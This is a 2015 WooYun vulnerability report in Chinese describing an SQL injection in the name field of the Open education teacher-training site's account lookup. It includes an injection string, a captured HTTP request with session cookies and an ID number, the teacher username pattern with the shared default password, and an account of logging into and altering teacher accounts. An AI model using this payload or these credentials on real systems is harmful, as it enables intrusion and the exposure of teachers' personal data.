奥鹏教育某主站前台SQL注入可直接明文获取大量教师用户名/密码（登录后可查看修改教师所有敏感数据）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144080

漏洞标题：奥鹏教育某主站前台SQL注入可直接明文获取大量教师用户名/密码（登录后可查看修改教师所有敏感数据）

漏洞作者：暴走

提交时间：2015-09-29 19:16

修复时间：2015-10-08 09:03

公开时间：2015-10-08 09:03

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-29：细节已通知厂商并且等待厂商处理中
2015-09-30：厂商已经确认，细节仅向厂商公开
2015-10-08：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

有一段时间没挖奥鹏的洞了，今天提交一个。
登录后可查看修改教师身份证号码/手机号/邮箱/工作单位/学历等。

详细说明：

奥鹏教师培训网（http://www.ourteacher.com.cn）主站前台SQL注入可直接明文获取3897个教师用户名、密码（后台登录可查看修改教师身份证号码/手机号/邮箱/工作单位/学历等）

漏洞证明：

奥鹏教师培训网地址：http://www.ourteacher.com.cn
点击首页中的“帐号查询”

页面跳转到如下页面，经过测试该页面中“姓名”RealName参数存在注入，
例如姓名输入框输入：100' or '%'=,身份证号号码可以不用填写，省市随便选择.

此时，点击“查询”，系统响应结果如下，竟然明文返回了教师用户名、密码等信息！！！

然后抓包用SQMMAP在测试下，抓包如下：

POST /tools/UserSearchAjax.ashx HTTP/1.1
Host: ww.ourteacher.com.cn
Proxy-Connection: keep-alive
Content-Length: 91
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://ww.ourteacher.com.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://ww.ourteacher.com.cn/userquery.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: b_t_s_100400=a2efe6f5-9de2-4474-bc84-6341f57ece78; up_first_date=2015-09-29; up_beacon_id_100400=a2efe6f5-9de2-4474-bc84-6341f57ece78-1443490806648; ASP.NET_SessionId=y322wwbsxtefj25adqqwskxa; TC=8E6E857486D425BEBCA5A5F1295030A642B3CDA83FDB6DDDB0088EE10187CF97E1DEE64E545F3F7C260A313D70856BB3F448E4FF537C5D1E01438966B419E3C22C87602C75F50286618F7248357CB63DE1C40D73F4BC9954011011C475D4509E69E991CDBD8466907C9D7F277C2F926C5B670C1421977074D2D8BBB2AF70F3398BEC0CD1; Hm_lvt_8f0092cb19df2eb9527fc8c0a5765c89=1443490805,1443492069; Hm_lpvt_8f0092cb19df2eb9527fc8c0a5765c89=1443494309; up_page_stime_100400=1443494308972; up_beacon_vist_count_100400=35
RealName=1234&Identity=411381198511288412&Province=12000000&City=12010000&Township=12010300

SQLMAP跑出的结果如下：

经过测试发现该系统一共存在3897个用户名，（用户名格式都为2015hnqhqyczdl后面跟四位数字，例如2015hnqhqyczdl0001）

3897个用户名从(密码都为初始密码123456)
2015hnqhqyczdl0001
2015hnqhqyczdl0002
2015hnqhqyczdl0003
2015hnqhqyczdl0004
....
....
2015hnqhqyczdl3895
2015hnqhqyczdl3896
2015hnqhqyczdl3897

接下来登录下2015hnqhqyczdl0001/123456教师帐号，身份证号码、邮箱、手机等信息都在这。

修改用户信息：

再登录下2015hnqhqyczdl0004/123456帐号：

OK，问题证明到此，就不一一登录了...

修复方案：

你们比我懂！

版权声明：转载请注明来源暴走@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：9

确认时间：2015-09-30 10:26

厂商回复：

我们会尽快联系业务部门处理。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144080

漏洞标题：奥鹏教育某主站前台SQL注入可直接明文获取大量教师用户名/密码（登录后可查看修改教师所有敏感数据）

相关厂商：open.com.cn

漏洞作者：暴走

提交时间：2015-09-29 19:16

修复时间：2015-10-08 09:03

公开时间：2015-10-08 09:03

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源暴走@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144080

漏洞标题：奥鹏教育某主站前台SQL注入可直接明文获取大量教师用户名/密码（登录后可查看修改教师所有敏感数据）

相关厂商：open.com.cn

漏洞作者： 暴走

提交时间：2015-09-29 19:16

修复时间：2015-10-08 09:03

公开时间：2015-10-08 09:03

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经修复

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0144080"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 暴走@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：暴走

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源暴走@乌云